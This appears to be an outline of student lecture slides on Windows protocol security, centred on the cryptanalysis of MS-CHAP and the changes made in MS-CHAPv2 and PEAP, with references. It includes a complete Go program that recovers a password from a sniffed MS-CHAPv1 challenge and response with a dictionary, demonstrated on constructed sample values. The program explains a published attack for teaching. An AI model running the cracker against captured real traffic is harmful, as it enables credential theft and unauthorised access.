Gros, Charles-Henri
Haley, David
Lisanke, Bob
Schaff, Clovis
Outline
- Overview of Windows Security Issues
- Various Protocols and Problems
- Introducing MSCHAP
- MSCHAP to MSCHAP2
- MSCHAP2 to PEAP
- Murφ Models
- Lessons Learned
- Wed Mar 10, 6:55 PM ET
  SEATTLE (Reuters) - Microsoft Corp. (Nasdaq:MSFT - news) upgraded a recent security warning to "critical" after discovering new ways in which an attacker could run malicious software on a vulnerable computer, the world's largest software maker said on Wednesday.
  The software flaw, which affects the two latest versions of Microsoft's Outlook e-mail, calendar and contacts program, was initially rated as "important" in Microsoft's monthly security bulletin issued on Tuesday.
- Transport layers
  - NetBIOS, NetBEUI, TCP/IP…
- Protocols on top
  - SMB, RPC, NetMeeting…
- Many dialects of protocols
  - SMB: PC NETWORK PROGRAM 1.0, LanMan 1.0/2.0, NT LM 0.12, CIFS…
- Backwards compatibility between all the various dialects
- More implementations: more potential for human error (incorrect code…)
- Holes in client-side code (ActiveX…)
- Programmer laziness/carelessness
- Windows empowers the user: a less restrictive environment
- Easy for the unwary user to execute unwanted code (email virus)
- Convenience vs. security (automatic parsing of HTML email, etc.)
- Uneducated user = highly vulnerable
- Cryptanalysis of MS-CHAP:
- Dictionary attack [L0pht proved it is efficient]
  (Notation: P0…P13 is the upper-cased, zero-padded 14-byte password; K0…K20 is the 16-byte LanMan hash padded with five zero bytes and cut into three 7-byte DES keys; R0…R23 is the 24-byte challenge response. Since K16…K20 are always zero, the third DES key has only 16 unknown bits.)
  - Offline: pre-computed DES encryption of each of the likely values of P0…P6 and P7…P13
  - Given R0…R7, R8…R15, R16…R23 seen on the link:
    1. Retrieve K14 and K15: average 2^15 DES ops.
    2. For the N2 likely values of P7…P13 (DES encryption known): K14 and K15 retrieved, N2/2^16 DES trials max.
    3. For the N1 likely values of P0…P6: K7 retrieved, N1/2^8 DES trials max.
- Cryptanalysis of MPPE: the session key is also derived from the password
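The three steps above carried out end to end, as an added example written for this page (it is not code from the slides, from L0pht or from any of the cited papers): it builds the LanMan hash and the MS-CHAPv1 LanMan response in Go with the standard-library crypto/des, then recovers the password from a sniffed challenge/response pair and a word list. The challenge bytes, the word list and the victim password "Password1" are constructed for the demonstration, and every function name is the example's own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"strings"
)

// lmMagic is the fixed plaintext each 7-byte password half DES-encrypts to produce the LM hash.
var lmMagic = []byte("KGS!@#$%")

// desKey spreads a 7-byte (56-bit) key into 8 bytes of 7 key bits each; the DES key schedule ignores the low (parity) bit.
func desKey(k7 []byte) []byte {
	var n uint64
	for _, x := range k7 {
		n = n<<8 | uint64(x)
	}
	k8 := make([]byte, 8)
	for i := range k8 {
		k8[i] = byte(n>>(49-7*i)) << 1
	}
	return k8
}

// desEncrypt is a single DES block encryption of block under the 7-byte key k7.
func desEncrypt(k7, block []byte) []byte {
	c, _ := des.NewCipher(desKey(k7)) // cannot fail: the key is always 8 bytes
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash is the 16-byte LanMan hash H0..H15 of the upper-cased, zero-padded 14-byte password P0..P13:
// P0..P6 and P7..P13 each encrypt lmMagic independently.
func lmHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	return append(desEncrypt(p[:7], lmMagic), desEncrypt(p[7:], lmMagic)...)
}

// lmResponse is the 24-byte MS-CHAPv1 LanMan response R0..R23: the hash plus five zero bytes (K0..K20)
// is cut into three 7-byte DES keys that each encrypt the 8-byte challenge.
func lmResponse(hash, challenge []byte) []byte {
	k := make([]byte, 21)
	copy(k, hash)
	r := append(desEncrypt(k[0:7], challenge), desEncrypt(k[7:14], challenge)...)
	return append(r, desEncrypt(k[14:21], challenge)...)
}

// candidateHalves lists the 7-byte halves of every dictionary word as the attack's "likely values".
func candidateHalves(words []string) (halves [][]byte) {
	for _, w := range words {
		p := make([]byte, 14)
		copy(p, strings.ToUpper(w))
		halves = append(halves, p[:7], p[7:])
	}
	return append(halves, make([]byte, 7)) // the all-zero P7..P13 of any password of 7 chars or fewer
}

// recoverLM runs the slide's three steps on a sniffed challenge/response pair; it returns the upper-cased password when both halves are among the candidates.
func recoverLM(challenge, resp []byte, halves [][]byte) (string, bool) {
	// Step 1: K16..K20 are always zero, so only K14,K15 (16 bits) of the third key are unknown.
	k14, k15, found := byte(0), byte(0), false
	for v := 0; v < 1<<16 && !found; v++ {
		k14, k15 = byte(v>>8), byte(v)
		found = bytes.Equal(desEncrypt([]byte{k14, k15, 0, 0, 0, 0, 0}, challenge), resp[16:24])
	}
	if !found {
		return "", false
	}
	// Step 2: H8..H15 of each candidate P7..P13 is precomputable; only the ~N2/2^16 whose H14,H15 equal K14,K15 get a trial.
	for _, second := range halves {
		h2 := desEncrypt(second, lmMagic)
		if h2[6] != k14 || h2[7] != k15 {
			continue
		}
		// Step 3: K7 (= H7) is the only unknown byte of the second key K7..K13, so 2^8 trials on
		// R8..R15 recover it; then only first halves whose H7 equals K7 need a trial on R0..R7.
		for k7 := 0; k7 < 256; k7++ {
			if !bytes.Equal(desEncrypt(append([]byte{byte(k7)}, h2[:6]...), challenge), resp[8:16]) {
				continue
			}
			for _, first := range halves {
				h1 := desEncrypt(first, lmMagic)
				if h1[7] == byte(k7) && bytes.Equal(desEncrypt(h1[:7], challenge), resp[0:8]) {
					return strings.TrimRight(string(first)+string(second), "\x00"), true
				}
			}
		}
	}
	return "", false
}

func main() {
	// Constructed sample: an 8-byte challenge and the response a client sends for "Password1".
	challenge := []byte{0x10, 0x32, 0x54, 0x76, 0x98, 0xba, 0xdc, 0xfe}
	resp := lmResponse(lmHash("Password1"), challenge)
	pw, ok := recoverLM(challenge, resp, candidateHalves([]string{"letmein", "welcome1", "secret", "admin", "password1"}))
	fmt.Println(pw, ok) // LM is case-insensitive, so the upper-cased form PASSWORD1 comes back
}
```

The loops map directly onto the slide's costs: the step-1 loop is at most 2^16 DES operations regardless of the dictionary, step 2 spends one precomputable DES per candidate and then filters on two hash bytes, and step 3 spends at most 2^8 trials per surviving candidate before filtering the first halves on one byte. The NT response of MS-CHAP pads the MD4-based NT hash with the same five zero bytes, so step 1 applies to it unchanged; it is left out here only because MD4 is not in Go's standard library.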
- Creator: Mudge, Schneier's co-author of the article
- MSCHAP1: Failure_PasswordExpired forces the weak LanMan hash to be sent
- According to Murφ, however, there is still a man-in-the-middle attack
- Solution: include the server's name in the hash
- MSCHAP2 still depends on the secrecy and strength of the password!
- RFCs
  - RFC 2759 (MS-CHAPv2): http://www.zvon.org/tmRFC/RFC2759/Output/index.html
  - RFC 2433 (MS-CHAPv1): http://www.zvon.org/tmRFC/RFC2433/Output/index.html
  - RFC 1994 (CHAP): http://www.zvon.org/tmRFC/RFC1994/Output/index.html
- Schneier papers:
  - http://www.schneier.com/paper-pptp.html
  - http://www.schneier.com/paper-pptpv2.html
- MS Knowledge Base
  - Articles 297816, 285189, 297840, 297818
- MSDN:
  - http://msdn.microsoft.com/library/en-us/wceeap/html/cxconextensibleauthenticationprotocol.asp
- SMB/CIFS:
  - What is SMB?, Richard Sharpe, 2002, http://samba.org/cifs/docs/what-is-smb.html
  - Implementing CIFS, Christopher R. Hertel, 2003, http://www.ubiqx.org/cifs/